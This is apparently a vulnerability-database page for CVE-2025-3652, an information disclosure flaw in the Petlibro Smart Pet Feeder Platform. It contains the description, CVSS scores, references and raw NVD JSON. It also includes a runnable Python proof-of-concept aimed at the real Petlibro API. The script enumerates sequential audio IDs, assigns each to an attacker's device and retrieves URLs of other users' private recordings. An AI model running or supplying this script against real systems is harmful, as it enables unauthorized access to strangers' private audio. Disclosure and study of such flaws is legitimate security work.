CVE-2025-3652

Description

Petlibro Smart Pet Feeder Platform versions up to 1.7.31 contains an information disclosure vulnerability that allows unauthorized access to private audio recordings by exploiting sequential audio IDs and insecure assignment endpoints. Attackers can send requests to /device/deviceAudio/use with arbitrary audio IDs to assign recordings to any device, then retrieve audio URLs to access other users' private recordings.

CVSS Details

CVSS Score

5.3

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:petlibro:petlibro:*:*:*:*:-:*:*:* - VULNERABLE

Petlibro Smart Pet Feeder Platform < 1.7.32

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests

# CVE-2025-3652 PoC - Petlibro Audio Information Disclosure
# Target: Petlibro Smart Pet Feeder Platform <= 1.7.31

TARGET_HOST = "https://api.petlibro.com"
ATTACKER_DEVICE_ID = "attacker_device_id_here"
TARGET_AUDIO_ID = 1  # Starting from sequential ID

def assign_audio_to_device(audio_id, device_id):
    """Assign arbitrary audio ID to attacker's device via vulnerable endpoint"""
    endpoint = f"{TARGET_HOST}/device/deviceAudio/use"
    payload = {
        "audioId": audio_id,
        "deviceId": device_id
    }
    response = requests.post(endpoint, json=payload)
    return response

def get_audio_url(device_id):
    """Retrieve audio URL after assignment"""
    endpoint = f"{TARGET_HOST}/device/deviceAudio/list"
    params = {"deviceId": device_id}
    response = requests.get(endpoint, params=params)
    if response.status_code == 200:
        data = response.json()
        return data.get("audioUrl")
    return None

def exploit():
    print("[*] Starting CVE-2025-3652 exploitation...")
    for audio_id in range(1, 100):  # Enumerate audio IDs
        print(f"[*] Trying audio ID: {audio_id}")
        assign_resp = assign_audio_to_device(audio_id, ATTACKER_DEVICE_ID)
        if assign_resp.status_code == 200:
            audio_url = get_audio_url(ATTACKER_DEVICE_ID)
            if audio_url:
                print(f"[!] Found accessible audio: {audio_url}")
                return audio_url
    print("[*] Exploitation complete")

if __name__ == "__main__":
    exploit()

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-3652
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-3652
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-3652/
[4] VulDB https://vuldb.com/cve/CVE-2025-3652
[5] https://bobdahacker.com/blog/petlibro
[6] https://www.vulncheck.com/advisories/petlibro-smart-pet-feeder-platform-through-audio-information-disclosure-via-api-endpoint

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-3652", "sourceIdentifier": "[email protected]", "published": "2026-01-04T00:15:43.950", "lastModified": "2026-02-03T17:40:56.770", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Petlibro Smart Pet Feeder Platform versions up to 1.7.31 contains an information disclosure vulnerability that allows unauthorized access to private audio recordings by exploiting sequential audio IDs and insecure assignment endpoints. Attackers can send requests to /device/deviceAudio/use with arbitrary audio IDs to assign recordings to any device, then retrieve audio URLs to access other users' private recordings."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 6.9, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-288"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:petlibro:petlibro:*:*:*:*:-:*:*:*", "versionEndIncluding": "1.7.31", "matchCriteriaId": "0B604E0A-05A3-46E0-8558-FF3F00F5EF0D"}]}]}], "references": [{"url": "https://bobdahacker.com/blog/petlibro", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://www.vulncheck.com/advisories/petlibro-smart-pet-feeder-platform-through-audio-information-disclosure-via-api-endpoint", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}